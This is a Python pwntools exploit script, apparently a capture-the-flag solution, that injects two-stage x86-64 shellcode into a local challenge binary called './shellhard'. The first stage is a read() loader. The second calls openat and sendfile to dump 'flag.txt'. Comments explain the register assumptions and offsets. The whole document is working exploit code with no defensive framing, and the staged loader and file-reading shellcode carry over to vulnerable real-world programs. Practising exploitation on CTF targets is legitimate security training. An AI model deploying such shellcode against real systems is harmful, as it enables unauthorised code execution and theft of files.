#!/usr/bin/python3
"""Two-stage shellcode driver for the local ``./shellhard`` challenge binary.

Stage 1 is a minimal read(2) stub that pulls the larger stage 2 into memory;
stage 2 opens ``flag.txt`` and copies it to stdout with sendfile(2).  The
assembly inherits several registers from the binary's state at entry; those
assumptions are marked inline and are not checked by this script.
"""
from pwn import *

# Loading the ELF sets context.arch/bits so asm() targets the right ISA;
# checksec=False only silences the mitigation banner.
context.binary = target = ELF("./shellhard", checksec=False)
r = process()


# funcs
def send_stage(payload):
    """Send *payload* as one line once the binary has printed its ``": "`` prompt."""
    return r.sendlineafter(b": ", payload)


# stage 1: a loader.  Only rsi and the byte count are set here; rax (syscall
# number), rdi (fd) and the base value of rdx are whatever the binary left
# behind -- presumably rax=0 (read) and rdi=0 (stdin), with rdx pointing at
# writable memory.  TODO confirm against the binary.
#   mov rsi, rdx   -> buffer = value already in rdx
#   cqo            -> rdx = sign-extension of rax (0 while rax is non-negative)
#   mov dl, 0xff   -> count = 0xff
STAGE1_SRC = """
mov rsi, rdx
cqo
mov dl, 0xff
syscall
"""
send_stage(asm(STAGE1_SRC))

# stage 2: openat(AT_FDCWD, "flag.txt", 0, 0) followed by
# sendfile(1, fd, NULL, 0xff).
#   lea rsi, [rcx+48] -> path pointer; rcx holds the return address left by the
#                        previous syscall, and +48 must land on the trailing
#                        "flag.txt" bytes.  Layout-dependent: re-check if the
#                        nop sled or instruction sequence changes.
#   mov edi, -100     -> AT_FDCWD
#   xor rdx, rdx      -> flags = 0 (O_RDONLY)
#   xor r10, r10      -> mode = 0
#   mov rax, 257      -> SYS_openat (x86-64)
#   mov rsi, rax      -> in_fd = fd returned by openat
#   mov rdi, 1        -> out_fd = stdout
#   add r10b, 0xff    -> count = 0xff (r10 was zeroed above and is preserved
#                        across the syscall, which clobbers only rax/rcx/r11)
#   mov rax, 40       -> SYS_sendfile (x86-64); offset = rdx = NULL
STAGE2_SRC = """
lea rsi, [rcx+48]
mov edi, -100
xor rdx, rdx
xor r10, r10
mov rax, 257
syscall
mov rsi, rax
mov rdi, 1
add r10b, 0xff
mov rax, 40
syscall
"""
# nop sled, the code, then the NUL-terminated filename the lea above points at.
stage2_payload = b"".join([b"\x90" * 10, asm(STAGE2_SRC), b"flag.txt\0"])
send_stage(stage2_payload)

# Hand the terminal over so the sendfile output (and any prompt) is visible.
r.interactive()